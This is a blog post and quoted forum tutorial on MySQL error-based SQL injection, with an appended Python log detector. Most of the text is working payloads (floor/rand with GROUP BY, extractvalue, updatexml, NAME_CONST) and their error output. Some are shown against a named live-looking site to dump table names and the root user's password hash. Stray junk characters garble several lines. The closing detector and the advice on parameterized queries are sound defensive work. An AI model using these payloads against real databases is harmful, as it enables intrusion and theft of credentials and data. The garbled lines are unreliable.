MySQL error-based injection: three techniques using floor(), ExtractValue() and UpdateXml()

Posted 2015-11-11 19:03:37

1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace the expression at the position of version() with another subquery.
For example, to retrieve the administrator username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


More collected examples:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: using NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

4 Q$ h3 ]8 Q  C3 B
& I, s  o( m! g( G6 _1 \VAR = Your MySQL variable.3 f& y7 I6 S- f

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

  d9 Q% ]5 G, \
6 I0 s6 g: Z% |  u' i' A: c; ^3 t' d1 W& |/ N4 W- V/ R
7 h. j  @9 F8 Z0 m, I* X$ @" S

0 z% r, J8 ~1 C2 k! T2 ?Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...0 z$ y) T" l# D& C

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here, if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
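As an added example (not part of the original post or the quoted tutorial), the following Python detector URL-decodes the request line of each web access-log entry and flags the four payload families shown on this page: floor(rand(0)*2) with GROUP BY, extractvalue(), updatexml(), and the doubled NAME_CONST() column trick. The log lines, client addresses and paths in it are constructed for illustration.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Payload families from the post; every pattern in a family must match the decoded
# query. floor/rand needs GROUP BY as well (either order); the NAME_CONST trick
# repeats the same call so MySQL raises "Duplicate column name".
SIGNATURES = [
    ("floor_groupby", [r"floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\)", r"\bgroup\s+by\b"]),
    ("extractvalue", [r"\bextractvalue\s*\("]),
    ("updatexml", [r"\bupdatexml\s*\("]),
    ("name_const", [r"\bname_const\s*\(.*\bname_const\s*\("]),
]
COMPILED = [(n, [re.compile(p, re.I | re.S) for p in ps]) for n, ps in SIGNATURES]
# Combined-format access-log line: client, identd, user, [time], "METHOD URL PROTO", status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (not real traffic): a benign request, three injection attempts
# (the floor one double-URL-encoded), and a benign request that merely contains "floor".
SAMPLE_LOG = """\
203.0.113.7 - - [11/Nov/2015:19:03:37 +0800] "GET /detail.php?id=330&sid=19 HTTP/1.1" 200 5120
203.0.113.7 - - [11/Nov/2015:19:04:01 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 812
203.0.113.7 - - [11/Nov/2015:19:04:12 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 790
203.0.113.7 - - [11/Nov/2015:19:04:20 +0800] "GET /article.php?id=1%2520and%2520(select%25201%2520from%2520(select%2520count(*),concat(version(),floor(rand(0)*2))x%2520from%2520information_schema.tables%2520group%2520by%2520x)a) HTTP/1.1" 500 801
198.51.100.4 - - [11/Nov/2015:19:05:00 +0800] "GET /article.php?id=2&sort=floor_price HTTP/1.1" 200 4410
"""

def decode_query(url: str, rounds: int = 3) -> str:
    """Return the URL-decoded query string, unwrapping nested (double) encoding."""
    query = url.partition("?")[2]
    for _ in range(rounds):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query

def classify(url: str) -> List[str]:
    """Names of the error-based injection families present in the request URL."""
    query = decode_query(url)
    return [name for name, pats in COMPILED if all(p.search(query) for p in pats)]

def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse access-log lines and report requests carrying a known payload family."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match and (families := classify(match["url"])):
            hits.append({"ip": match["ip"], "status": int(match["status"]), "families": families})
    return hits
```

A matching request answered with a 500 is the usual trace of these probes, and the error strings quoted throughout this post (Duplicate entry ... for key 'group_key', XPATH syntax error, Duplicate column name) appearing in a response body confirm that the database error reached the client. The underlying fix is parameterized queries and never returning raw database errors to users.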
